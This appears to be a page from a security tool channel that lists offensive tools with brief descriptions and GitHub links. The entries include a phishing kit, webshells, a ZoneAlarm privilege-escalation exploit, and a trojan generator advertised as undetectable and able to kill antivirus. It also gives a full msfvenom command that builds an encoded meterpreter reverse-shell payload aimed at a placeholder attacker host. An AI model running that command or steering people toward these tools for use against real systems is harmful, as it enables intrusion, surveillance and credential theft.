HackGit

2022-04-27 16:16:00 ​BellasEye

A lightweight program written in BASH which automates and saves time during vulnerability analysis and penetration testing. It automates various tools such as NMAP, Gobuster, theHarvester etc.

It uses a custom designed Vulnerability Lookup which parses major databases like ExploitDB, National Vulnerability Database and VulDB (requires an API key). It saves all the outputs to separate files for easy use.

https://github.com/necromorph98/BellasEye Открыть/Комментировать

2022-04-27 14:14:00 ​KILLSHOT

A #Penetration Testing Framework, Information gathering tool & Website #vulnerability Scanner.

You Can use this tool to Spider your website and get important information and gather information automatically using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and find the vulnerability in your website using Cms #Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automatically multiple types of scan with #nmap and unicorn. And With this tool, You can Generate #PHP Simple Backdoors upload it manually and connect to the target using killshot.

This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths Spider can help you to find the parameter of the site and scan #XSS and #sql.

https://github.com/bahaabdelwahed/killshot Открыть/Комментировать

2022-04-27 11:11:00 ​HiddenEye

Modern Phishing Tool With Advanced Functionality

https://github.com/Morsmalleo/HiddenEye Открыть/Комментировать

2022-04-27 09:51:39 The Not-So Simple PHP Command Shell

Automates or simplifies many on target functions. Designed for windows targets. It isn't pretty, but it works as intended.

I have included an assortment of common windows enumeration and escalation tools. To generate your own msfvenom payload:

venom.exe : sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ATTACKBOXIP) LPORT=(ATTACBOXPORT) -e x64/shikata_ga_nai -f exe -o venom.exe

Including:
Simple system commands
File upload/download options
simple user manipulations (on compatible targets with sufficient privileges)
One click user info/ user permissions info
One click systeminfo
One Click processes list
One click file cleanup removes all files uploaded with this tool

https://github.com/kaotickj/The-Not-So-Simple-PHP-Command-Shell Открыть/Комментировать

2022-04-27 09:34:13 ​ZoneAlarmLPE

Exploit for LPE in ZoneAlarm Antivirus/Firewall.

Combination of weak permissions in C:\ProgramData\CheckPoint\ZoneAlaram\Data and self-protection bypass (self-protection driver failed to protect sensitive files from modification when file is accessed over UNC path) leads to LPE allowing any local user to elevate privileges to SYSTEM account.

https://github.com/Wh04m1001/ZoneAlarmLPE Открыть/Комментировать

2022-04-27 09:32:08 badkeys

Tool and library to check cryptographic public keys for known vulnerabilities

https://github.com/badkeys/badkeys Открыть/Комментировать

2022-04-27 09:31:38 k8s webshell

https://github.com/zhxiaohe/k8sexec Открыть/Комментировать

2022-04-26 21:58:38 ​Wordlists

Dictionaries of attack patterns and primitives for black-box application fault injection and resource discovery.

https://github.com/fuzzdb-project/fuzzdb
https://github.com/Karanxa/Bug-Bounty-Wordlists
https://github.com/orwagodfather/WordList
https://wordlists.assetnote.io/

#wordlist #fuzzing #bugbounty Открыть/Комментировать

2022-04-26 18:18:00 ​THorse

A AT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.

Features:
Works on Windows/Linux
Notify New Victim Via Email
Undetectable
Does not require root or admin privileges
Persistence
Sends Screenshot of Victim PC's Screen via email
Give Full Meterpreter Access to Attacker
Didn't ever require Metasploit installed to create a trojan
Creates Executable Binary With Zero Dependencies
Create less size ~ 5Mb payload with advanced functionality
Obfusticate the Payload before Compiling it, hence Bypassing a few more antivirus
Generated Payload is Encrypted with base64, hence makes it extremely difficult to reverse engineer the payload
Function to Kill Antivirus on Victim PC and tries to disable the Security Center.
And more.

https://github.com/PushpenderIndia/thorse Открыть/Комментировать

2022-04-26 17:17:00 ​jSQL Injection

Lightweight application used to find database information from a distant server.

It's free, open source and cross-platform for Windows, Linux and Mac and it works with Java from version 11 to 17.

Kali Linux logo jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux.

Automatic injection of 33 database engines: Access, Altibase, C-treeACE, CockroachDB, CUBRID, DB2, Derby, Exasol, Firebird, FrontBase, H2, Hana, HSQLDB, Informix, Ingres, InterSystems-IRIS, MaxDB, Mckoi, MemSQL, MimerSQL, MonetDB, MySQL, Neo4j, Netezza, NuoDB, Oracle, PostgreSQL, Presto, SQLite, SQL Server, Sybase, Teradata and Vertica
Multiple injection strategies: Normal, Error, Blind and Time
Various injection processes: Default, Zip, Dios
Database fingerprint: Basic error, Order By error, Boolean single query
Script sandboxes for SQL and tampering
List to inject multiple targets
Read and write files using injection
Create and display Web shell and SQL shell
Bruteforce password hash
Search for admin pages
Hash, encode and decode text
Authenticate using Basic, Digest, NTLM and Kerberos
Proxy connection on HTTP, SOCKS4 and SOCKS5

https://github.com/ron190/jsql-injection Открыть/Комментировать